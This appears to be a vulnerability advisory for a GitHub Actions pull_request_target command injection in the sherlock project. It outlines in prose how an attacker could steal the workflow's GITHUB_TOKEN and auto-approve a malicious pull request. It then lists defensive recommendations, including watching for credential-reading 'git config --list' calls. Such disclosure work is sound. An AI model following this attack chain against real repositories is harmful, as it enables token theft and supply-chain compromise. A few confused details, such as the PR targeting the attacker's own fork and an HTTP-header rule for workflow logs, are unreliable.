sherlock-project/sherlock GitHub Actions RCE via pull_request_target Injection (CVE-2026-44590)

CVE-2026-44590 is a critical command injection vulnerability found in the validate_modified_targets.yml GitHub Actions workflow of the sherlock-project/sherlock repository. Discovered and reported by Astaruf, this vulnerability allows any GitHub user to open a pull request that triggers arbitrary command execution within the privileged Continuous Integration (CI) environment. The vulnerability stems from the pull_request_target event, which, without proper input sanitization, permits the injection of malicious commands into the workflow. This exploit allows attackers to exfiltrate the GITHUB_TOKEN and automatically approve malicious pull requests, potentially leading to supply chain compromise without any human review. The proof-of-concept (PoC) automates the entire attack chain, highlighting the severity and ease of exploitation of this vulnerability.

Attack Chain

1. Attacker forks the sherlock-project/sherlock repository.
2. Attacker creates a malicious branch with a crafted payload designed to inject commands into the validate_modified_targets.yml workflow.
3. The attacker opens a pull request (PR) targeting the master branch of their fork, triggering the pull_request_target event.
4. The GitHub Actions workflow executes the injected payload, which can include commands to exfiltrate sensitive information.
5. The injected payload extracts the GITHUB_TOKEN from the workflow environment by reading git config --list.
6. The stolen GITHUB_TOKEN is used to authenticate against the GitHub API.
7. The attacker uses the stolen token to automatically approve the malicious pull request via the GitHub API, specifically the POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews endpoint.
8. The malicious PR is merged, resulting in a supply chain compromise.

Impact

Successful exploitation of CVE-2026-44590 can lead to a full supply chain compromise. An attacker could inject malicious code into the sherlock-project/sherlock repository (or forks thereof), potentially affecting all users of the software. The automated nature of the attack, involving token exfiltration and automatic PR approval, significantly increases the risk, reducing the need for manual interaction. The impact is substantial as it allows for code injection into the project’s codebase, potentially affecting all downstream users and dependencies.

Recommendation

• Monitor GitHub Actions workflow execution logs for unusual command invocations, particularly those involving git config --list, using a webserver rule on product linux that examines HTTP request headers.
• Implement input validation and sanitization in GitHub Actions workflows, particularly when using the pull_request_target trigger, to prevent command injection as described in CVE-2026-44590.
• Enforce strict branch protection rules and require code review by multiple trusted developers before merging any pull requests, even those approved by GitHub Actions.
• Deploy the Sigma rule Detect Suspicious Sherlock GitHub Actions Workflow Activity to detect potential exploitation attempts by monitoring process creation events.
• Review and audit existing GitHub Actions workflows for similar vulnerabilities and apply necessary security patches or mitigations.